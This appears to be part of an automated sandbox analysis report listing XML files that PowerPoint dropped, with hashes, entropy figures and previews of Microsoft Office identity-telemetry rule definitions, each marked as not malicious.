                                                                                                                              MD5:5D3F05C08B281744750899694A2B272D
                                                                                                                              SHA1:2332176BEBA4313BE04E99387E9079F08A251D00
                                                                                                                              SHA-256:D76F935F529603AD6948760BF052541CC36345D0FE1F8704ADC877ED325CFF60
                                                                                                                              SHA-512:A542C5C2448E13E5442FA96071C1289F938E93F402FD403B2F13716D85F40E3CED9456DF687A40A054C1F31696D4ECA3F38EC259335EB3DF65541CCD5006F33C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63048" V="6" DC="SM" EN="Office.Identity.MsaSso" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bch1w" />.. <UTS T="2" Id="a3qpl" />.. <UTS T="3" Id="a3qpk" />.. <UTS T="4" Id="a3qpj" />.. <UTS T="5" Id="a3qpu" A="a3qpn" />.. <UTS T="6" Id="a3qpv" A="a3qpo" />.. <UTS T="7" Id="bch10" A="bd692" />.. <UTS T="8" Id="bch1x" />.. <UTS T="9" Id="bch1t" A="befh4 befh7" />.. <UTS T="10" Id="bch1z" />.. <A T="11" E="TelemetryShutdown" />.. <TO T="12" I="10min">.. <S T="1" />.. </TO>.. </S>.. <C T="B" I="0" O="false" N="OfficeIdentity_EqualTo_OidaIdentity">.. <O T="NE">.. <L>.. <C>.. <S T="2" />.. </C>.. </L>.. <R>.. <V V="0" T="U32" />.. </R>.. </O>.. </C>.. <C T="B" I="1" O="false" N="BadOfficeIdentity_EqualTo_OidaIdentity">.. <O T="NE">.. <L>.. <C>.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1251
                                                                                                                              Entropy (8bit):4.702490763905221
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdKBIV+d8WuXV4Wni0LcefQjEBzDLg5/eX1lVfp4SApfXjlpFjupfX/mNxvofZ:2dOIUen/PYOcoPfudp9UlV5Fslo
                                                                                                                              MD5:94786F217AF30A964E78EE13ADD15779
                                                                                                                              SHA1:7EAD20ABC144AACC5E780C7E2778625B7B172120
                                                                                                                              SHA-256:5B13815B6B374BB2046B0E1DF81D276B9D6DAB24A3C5EE015E3C23685F4F033D
                                                                                                                              SHA-512:FEAB41F4B72C5A41FC581A33D13F5FE7CED666579AFEC8410F531F0EEE6E3BFD5F5C286B0FC7655D5776AA4343C376D917F63433E83AA7A575D3C57E52E73865
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63049" V="2" DC="SM" EN="Office.Identity.IdentityExceptionAggregation" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" DCa="PSP PSU" xmlns="">.. <S>.. <R T="1" R="63053" />.. <TI T="2" I="30s" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="1" />.. <F N="2" />.. <F N="3" />.. <F N="4" />.. <F N="5" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="StartTime">.. <A T="MIN">.. <S T="1" F="0" />.. </A>.. </C>.. <C T="FT" I="1" O="false" N="EndTime">.. <A T="MAX">.. <S T="1" F="0" />.. </A>.. </C>.. <C T="TAG" I="2" O="false" N="Tag">.. <S T="1" F="1" />.. </C>.. <C T="U32" I="3" O="false" N="LoggingCategory">.. <S T="1" F="2" />.. </C>.. <C T="TAG" I="4" O="true" N="ExceptionTag">.. <S T="1" F="3" />.. </C>.. <C T="U32" I="5" O="false" N="Type">.. <S T="1" F="4" /
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1605
                                                                                                                              Entropy (8bit):4.891709249185111
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9o3COUenQrornhrXWwTnzP3/qi/McEF4P2LIUPj7sQl:c9yCOUenQ01SoEF4eLIZC
                                                                                                                              MD5:5E71C951E0742553F6CA814BD504DEC9
                                                                                                                              SHA1:1EA52D66B91F903FF4CD4CB9C663F0819F8D43C1
                                                                                                                              SHA-256:77FEBBA76653660D10D002F38BDC83B9E09C0DCEED07F71DA975AAF96E887E9B
                                                                                                                              SHA-512:88B29CCB5E1F89F86504E623FDD30002C3ABF4BDAD62193BF3C27E0361BA6240C5D8C91052695A83D36237144CBF61DA4A904F72D5C50F7E69A5846F42074BCD
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63051" V="5" DC="SM" EN="Office.Identity.IdentityAuthHistoryPassthrough" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="befh4" A="befh7" />.. <UTS T="2" Id="befh8" />.. <UTS T="3" Id="befhk" />.. <US T="4">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </US>.. <US T="5">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="U64" I="0" O="false" N="LastLoginDelta">.. <S T="4" F="LastLoginDelta" />.. </C>.. <C T="W" I="1" O="false" N="ErrorState">.. <O T="COALESCE">.. <L>.. <S T="5" F="PreviousIdentityMetadata_IdentityErrorState" />.. </L>.. <R>.. <S T="3" F="ErrorState" />.. </R>.. </O>.. </C>.. <C T="W" I="2" O="true" N="ProviderType">.. <S T="5" F="PreviousIdentityMetadata_IdentityProviderType" />.. </C>.. <C T="B" I="3" O="true" N="IsPersisted">.. <S T="5" F="P
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2757
                                                                                                                              Entropy (8bit):4.676950301726056
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2diWp5J+AvyVndNoyF7EeY2bx9nyggtaJ8QDk2ScXVuWMHCEm1KVpRwC/6lP6co3:cBfqdPEj2ry3KwssHrmR6FyKQxE7
                                                                                                                              MD5:557F022390A055F50407978A892DAEEE
                                                                                                                              SHA1:9BC1F40138F32CF3FFAB4ACCECF72A68C9DA5516
                                                                                                                              SHA-256:8813A1F67BEBF5E7110DA35C31217E37D5DE71C94DC146F7E9F859B32AB286F5
                                                                                                                              SHA-512:678D77842112386808C4F0A7433DC056A00102FCB7D40589126BEED21995B360BF46FA68670DB0320357BF7D94FE0FC4EFE5DDE75976E84F7105ACC35A9EEF20
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63052" V="3" DC="SM" T="Subrule" xmlns="">.. <S>.. <UCSS T="1" C="ADAL Authentication" S="Monitorable" />.. <UCSS T="2" C="Identity Accounts Control" S="Monitorable" />.. <UCSS T="3" C="IdentityADALClient" S="Monitorable" />.. <UCSS T="4" C="IdentityADALClientCritical" S="Monitorable" />.. <UCSS T="5" C="Identity Authentication Client" S="Monitorable" />.. <UCSS T="6" C="Identity Authentication Client Critical" S="Monitorable" />.. <UCSS T="7" C="IdentityAuthenticationCredStore" S="Monitorable" />.. <UCSS T="8" C="Identity Authentication CredSync" S="Monitorable" />.. <UCSS T="9" C="Identity Authentication CredUtil" S="Monitorable" />.. <UCSS T="10" C="IdentityConnectedAccount" S="Monitorable" />.. <UCSS T="11" C="IdentityConnectedAccountCritical" S="Monitorable" />.. <UCSS T="12" C="Identity Credentials Client" S="Monitorable" />.. <UCSS T="13" C="Identity Critical Error" S="Monitorable" />.. <UC
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):646
                                                                                                                              Entropy (8bit):4.704780431425281
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdzyb/adFX/lVD6+UIpxXxupSEjEN1DRMxREmyNO2su:2dzvP0f+1ysmi
                                                                                                                              MD5:42C6398BD816D57918051FFC5E57801C
                                                                                                                              SHA1:9F181C67430453CDF26231C1A4CBD13C6FA25BAD
                                                                                                                              SHA-256:3353B2E43B1475100DBF61F5905932415845C075207AF45FE7679145322BB092
                                                                                                                              SHA-512:EF134DC1192613243EFA14753F06128B9AEB94827EEC4053A3DA2015B2DAE3821A7325CFB63BD6B56D95F7E80EDDFD448993A72F823B3D316E599C4FDB243057
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63053" V="1" DC="SM" T="Subrule" xmlns="">.. <S>.. <UCSS T="1" C="Identity Exception" S="Monitorable Unexpected" />.. </S>.. <C T="FT" I="0" O="false">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="TAG" I="1" O="false">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="U32" I="2" O="false">.. <S T="1" F="LoggingCategory" />.. </C>.. <C T="TAG" I="3" O="true">.. <S T="1" F="ExceptionTag" M="Ignore" />.. </C>.. <C T="U32" I="4" O="false">.. <S T="1" F="Type" />.. </C>.. <C T="U64" I="5" O="false">.. <S T="1" F="Error" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2070
                                                                                                                              Entropy (8bit):4.76787668390286
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9CUen/ZqqOchJPQNKFTAfC8+7DnqQEVo+lmnm8TWPsgV/Nb6K:csUen4qOebnSQEGg9sK
                                                                                                                              MD5:BE1902806DB4A7D279C1AC2FD6F69521
                                                                                                                              SHA1:77058A08FE11EABF3839B849AD9D7B06AE3AD1E1
                                                                                                                              SHA-256:97DFB4AFA54DAE960E3773449D05C3BE51E742B8C3D3B11C3B2D9EF971B855C1
                                                                                                                              SHA-512:5FB47F7A6D1C17015D539B0582A7DC3B05BB767E0DB656681668DAB32DEDEC3FD30A253DDDA91091A44A6609830B3684D2C630743AD42A1B987342DF2AA1ECB3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63054" V="5" DC="SM" EN="Office.Identity.GetAuthenticatedServiceTicketResultsCount" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" DCa="PSP PSU" xmlns="">.. <S>.. <R T="1" R="63046" />.. <TI T="2" I="Daily" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="1" />.. <F N="2" />.. <F N="3" />.. <F N="4" />.. <F N="5" />.. <F N="6" />.. <F N="7" />.. <F N="8" />.. <F N="9" />.. <F N="10" />.. <F N="11" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="MinRequestEndTime">.. <A T="MIN">.. <S T="1" F="0" />.. </A>.. </C>.. <C T="FT" I="1" O="false" N="MaxRequestEndTime">.. <A T="MAX">.. <S T="1" F="0" />.. </A>.. </C>.. <C T="U32" I="2" O="false" N="RequestsCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="TAG" I="3" O="false" N="ResultTag">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2869
                                                                                                                              Entropy (8bit):4.908269649381328
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cEUencIhUaNoYomMOkrddDVsKYQEVc+Xoh5VkQbJ7:RfgddDV9YQEV/YhkQl7
                                                                                                                              MD5:9E2126333067470D2BF1DD974B689656
                                                                                                                              SHA1:80538228C8EBB41E68038268070D0B5C233B70E2
                                                                                                                              SHA-256:9801668E92EC6362427AD65B0D95C141E8DA9D565C5A74C0482A7046E237DD68
                                                                                                                              SHA-512:EF9217291DD418D10093019BE5ADBA59AA794FAA1C8DB6AB17FFD2FCD8952DCC00D333A0B8A0D581AE534611EF2F3C8C7B57A30BE75C908CF9FF10B6187E6FC9
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63056" V="9" DC="SM" EN="Office.Identity.Win32Prompt" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns="">.. <S>.. <UTS T="1" Id="ax0z1" />.. <UTS T="2" Id="ax8x9" />.. <UTS T="3" Id="bd7ag" A="bd7ae bd7af awuqk" />.. <UTS T="4" Id="a8s0g" />.. <UTS T="5" Id="bd7ah" />.. <UTS T="6" Id="befhk" />.. <UTS T="7" Id="befh4" A="befh7" />.. <UTS T="8" Id="beo97" />.. <US T="9">.. <S T="6" />.. <S T="7" />.. </US>.. <US T="10">.. <S T="4" />.. <S T="5" />.. </US>.. <A T="11" E="TelemetryShutdown" />.. <TO T="12" I="10min">.. <S T="1" />.. </TO>.. </S>.. <C T="TAG" I="0" O="false" N="StartTag">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="TAG" I="1" O="true" N="HrdShownTag">.. <S T="2" F="ULS_Tag" />.. </C>.. <C T="TAG" I="2" O="true" N="EndTag">.. <S T="10" F="ULS_Tag" />.. </C>.. <C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2178
                                                                                                                              Entropy (8bit):4.905365060817116
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dFhQ+UenQrAKrdQrGrfCWrgkrETwr7cLEeQ+QnzVdjS+ynZFHlJylcnNXOH7:cg+UenQLyyrCW1oEruEexqOf/FOH7
                                                                                                                              MD5:75B566743A7B18F54F341B37CF21FADF
                                                                                                                              SHA1:4820F76E055755D2006F481BAFAC14BD9CBEE617
                                                                                                                              SHA-256:8AF4E695996E7E532A4C711D77E378DCD7A1E6A7D8FDDC48E4E863FAB562F5A1
                                                                                                                              SHA-512:E2571D4375B0C5A990B8794EAD579B11B4072FEB6B470B71FF49905FD4F1FB93C767CE6E257576E6D453C37240E2CDA8BF7FD43D2131EACB5730C073E002581A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63057" V="3" DC="SM" EN="Office.Identity.AdalCreateCredProvider" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="befh1" A="befho" />.. <UTS T="2" Id="a2otw" A="befhp" />.. <UTS T="3" Id="befh2" A="befhq" />.. <UTS T="4" Id="befh3" A="befhr" />.. <UTS T="5" Id="a2otx" A="befhs" />.. <UTS T="6" Id="befhk" />.. <US T="7">.. <S T="2" />.. <S T="3" />.. <S T="4" />.. <S T="5" />.. </US>.. <A T="8" E="TelemetryShutdown" />.. <TO T="9" I="10min">.. <S T="1" />.. </TO>.. </S>.. <C T="TAG" I="0" O="false" N="StartTag">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="TAG" I="1" O="true" N="EndTag">.. <S T="7" F="ULS_Tag" />.. </C>.. <C T="G" I="2" O="true" N="InitialState_IdentityUniqueID">.. <S T="1" F="IdentityMetadata_UniqueId" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="InitialState_IdentityPr
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):913
                                                                                                                              Entropy (8bit):4.9065245255107826
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd6qf0V+d8WuXV4WnerHKScDQjEBzDp1lVsAPXNUIp5XHaSMjlljuPXNO5ABsu:2dbf0UenQrHKyOPPMCyzG
                                                                                                                              MD5:C1B0EE9337737DA690EF1D36FC60E920
                                                                                                                              SHA1:7D1245FEB9921977A5E6909721A8355E7178FA77
                                                                                                                              SHA-256:CD564549341251E1A4C0DDA5B188152EA162BAE85B4178B5EFE48EE8EF163A2A
                                                                                                                              SHA-512:DB0F7F1DE23F4D863DD18E63A0CD950DFC211F5F22A5B32687B28F1198856DB16EDA36DFC5C82B0642EEFE7B05D0A8FF92A5636C0D740D254DD76FBD7EAE1411
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63058" V="0" DC="SM" EN="Office.Identity.ADALOnTopOfWAMSignal" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="biu0c" />.. <TI T="2" I="Hourly" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="ULS_Tag" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="FirstTimestamp">.. <A T="MIN">.. <S T="1" F="TimeStamp100ns" />.. </A>.. </C>.. <C T="TAG" I="1" O="false" N="Tag">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="U32" I="2" O="false" N="TagCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="FT" I="3" O="false" N="LastTimestamp">.. <A T="MAX">.. <S T="1" F="TimeStamp100ns" />.. </A>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. <S T="4" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):616
                                                                                                                              Entropy (8bit):5.204052822096694
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdyAV+d8WuXV2xAQ4WnereQUUIOiXQPJMMliXAAJMNO2su:2dyAUenc8re+hiAPiG
                                                                                                                              MD5:F98A9C6727DB647FD7043A3FF1087B49
                                                                                                                              SHA1:F8252553C722F81B8796A28ADB94293AA3282E14
                                                                                                                              SHA-256:58399B5B967AFCDBA716DCC89838A7050B51571EEC84F71A35765B6E00B5B9D1
                                                                                                                              SHA-512:FD1B8F3AEF2767843AD8A6B0795F82CE8AB29DB80D599C07A69797A38F13BFC7C98C39124782D7A590360829BC770B254A4D1A89A72B350AA1D1E8E1163684C2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63059" V="0" DC="SM" EN="Office.Identity.IdentityCountOnShutdown" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bj46m" A="bj46k" />.. </S>.. <C T="TAG" I="0" O="false" N="Tag">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="U64" I="1" O="false" N="ValidIdentityCount">.. <S T="1" F="ValidIdentityCount" />.. </C>.. <C T="U64" I="2" O="false" N="AllIdentityCount">.. <S T="1" F="AllIdentityCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):791
                                                                                                                              Entropy (8bit):4.793923039336871
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdOriQVbV+d8WuXV4WneroScDQjEBi+wsvXqNO6X/c///d0HYpON+PvX7fwXH0:2d6BUenQroyOJwOa16d0wsk
                                                                                                                              MD5:5CF4B77DC780C18C444B25B40D416452
                                                                                                                              SHA1:9685090E9EF84E3AE848E4CE0B771E43B0E06AAC
                                                                                                                              SHA-256:F9DE8B686230869DA19B1E004CF30B56E1910C1BBEB4EAD643F7DC48A8EAF522
                                                                                                                              SHA-512:5C558D4E387B80FB2C8E4ADE6CA454FC5B53B91CD685E31FDD67E8BF3BFAD02DD70AF8F83608B83BAA0AC6C4D01768E33332792A732E570E3DCFA9F1A19F6CF1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63063" V="1" DC="SM" EN="Office.Identity.ADALUseRefreshToken" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a1t65" />.. <TI T="2" I="Hourly" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. <F T="5">.. <O T="EQ">.. <L>.. <S T="1" F="SH_ErrorCode" />.. </L>.. <R>.. <V V="1252589578" T="U32" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="5">.. <F N="SH_ErrorCode" />.. </S>.. </G>.. <C T="U32" I="0" O="false" N="RefreshCount">.. <C>.. <S T="5" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. <S T="4" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):787
                                                                                                                              Entropy (8bit):5.115968261770895
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdtBXWuV+d8WuXV2xAQ4WnerynQ93zvbH9ocDQjEBzDpiUIROHaSMNO5ABsu:2dt1Uenc8rRJjbdIOF0
                                                                                                                              MD5:9D9C0766695BCF3A61B8EDC1E30A5D06
                                                                                                                              SHA1:78E07764647BD65F69872D7D1B15E77B69489796
                                                                                                                              SHA-256:7A98EF1BD7761F4AA3EEBB70DBA581760849B533FFB519CDF7E6DB1086B8E325
                                                                                                                              SHA-512:118F280B385719D12865ADD7F2073C64D31D1283842B3D235A73B16BDE0D1A2F7A472B0AED69B208BDFDE693F7636C363C8136B2C5D511990869F94B223698B3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63066" V="1" DC="SM" EN="Office.Identity.PromptAPICalls" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bb9fa" A="bqg6q bqg6t bqg6o bpfny aysno bqg6r bqg6p aysnm aysnj aysnx bqk5e bqk5d bqk5b bqg6n bqg6u" />.. <TI T="2" I="Hourly" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="ULS_Tag" />.. </S>.. </G>.. <C T="TAG" I="0" O="false" N="Tag">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="U32" I="1" O="false" N="HitCounts">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. <S T="4" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2870
                                                                                                                              Entropy (8bit):4.904185100591606
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cvqUencI4Yzcud/9WlGeR/0D3Ij0QH0f+QEVYVWjUtsmMU+z7:6qfcWJ3I76+QEVXjUtsmMUU7
                                                                                                                              MD5:C5B7E77D659AF1411D7D7C3F3EA71637
                                                                                                                              SHA1:9F354DAC7628EE6C5D0920521A1F0A7945391EE8
                                                                                                                              SHA-256:C5450A65CFA71256946664C5552CE55171A0D1E879023C862280C36794C18E47
                                                                                                                              SHA-512:4DF2102269E979AD75D7B5E3073056597475112A65EFC31BFEB50220CE2203C8A6B9502989A6762E18F82C074CD27F91C1FA857D8362E69B4D5B72CF7DC31B61
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63067" V="4" DC="SM" EN="Office.Identity.SspiPromptWin32" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns="">.. <S>.. <UTS T="1" Id="brt55" />.. <UTS T="2" Id="aysrs" A="aysrt" />.. <UTS T="3" Id="brt58" />.. <UTS T="4" Id="brt6b" />.. <UTS T="5" Id="bgm8f" A="bgm8g bgm8h bgm8i" />.. <UTS T="6" Id="a9qwz" A="brt56 brt6a" />.. <UTS T="7" Id="brt59" />.. <US T="8">.. <S T="3" />.. <S T="6" />.. <S T="4" />.. </US>.. <A T="9" E="TelemetryShutdown" />.. <TO T="10" I="10min">.. <S T="1" />.. </TO>.. </S>.. <C T="I32" I="0" O="false" N="AuthScheme">.. <S T="1" F="AuthScheme" />.. </C>.. <C T="B" I="1" O="false" N="Proxy">.. <S T="1" F="Proxy" />.. </C>.. <C T="BIN" I="2" O="true" N="DocumentUrlHash">.. <U T="OneWaySHA1HashToBinary">.. <S T="1" F="DocumentUrl" M="Ignore" />.. </U>.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1792
                                                                                                                              Entropy (8bit):4.9010788425455685
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dMNNUencIraWrNrFtqrRrKFrsfTYRIsIxDsXHmdJfOOdlRoHl2vAr7:csUencIfBeVW4f8Rf0Ds3CJfbJuIc7
                                                                                                                              MD5:F5FDF9A60D61365A29CF731101C97870
                                                                                                                              SHA1:9E4418281026CCED0B5B710875337616EF2A7140
                                                                                                                              SHA-256:C68DC07336858B94B54C3B6DD6FEAD8AA3B9E605AF7D637E13AD96B7D11CC9ED
                                                                                                                              SHA-512:69BFBC738D0E7795D9C009291297CC609EE9F69C89350EA8FD6F8ABC0B81BDB86D7617E210FFEADB7DE82D15D6EB8873171A86B03C71BBCE5857338B4EF7DFCE
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63069" V="0" DC="SM" EN="Office.Identity.FbaPromptWin32" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns="">.. <S>.. <UTS T="1" Id="br9s8" />.. <UTS T="2" Id="br9td" A="br9tg br9th br9ti br9tj" />.. <UTS T="3" Id="br9s9" A="br9ta br9tb br9tm br9tn br9to br9tq" />.. <UTS T="4" Id="br9tp" />.. <UTS T="5" Id="br9tf" />.. <UTS T="6" Id="bsqcp" />.. <US T="7">.. <S T="4" />.. <S T="3" />.. </US>.. <A T="8" E="TelemetryShutdown" />.. <TO T="9" I="10min">.. <S T="1" />.. </TO>.. </S>.. <C T="I32" I="0" O="false" N="AuthScheme">.. <S T="1" F="AuthScheme" />.. </C>.. <C T="BIN" I="1" O="true" N="DocumentUrlHash">.. <U T="OneWaySHA1HashToBinary">.. <S T="1" F="DocumentUrl" M="Ignore" />.. </U>.. </C>.. <C T="TAG" I="2" O="true" N="FlowTag">.. <S T="2" F="ULS_Tag" />.. </C>.. <C T="TAG" I="3" O="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1053
                                                                                                                              Entropy (8bit):5.092328766049697
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdZWV+d8WuXV2xAQ/erKere/Q9lVZT4S6jlW5RdjlV9GY34TqcPIb6Md+xqOEq:2dZWUencIrdre49PqIpcc+QOEeQ6DnzB
                                                                                                                              MD5:567A2B7B001A2ADAFA4FF2624004B0BB
                                                                                                                              SHA1:0C0F2F36AD01FE4214F8344F6088B30C063F2C5E
                                                                                                                              SHA-256:E0361CF37FE478D8845B56A49DD6B135320E0906AC39414FA452B96E514CCF53
                                                                                                                              SHA-512:9837592F6067464A27E403D37DFD7B41FF7DC22E714C3C72765349ACC659AC8763FDF871515CAA6AD38A1641336CD40BF4C4F21C360CE702BAFC8C48157AE016
                                                                                                                              Malicious:false
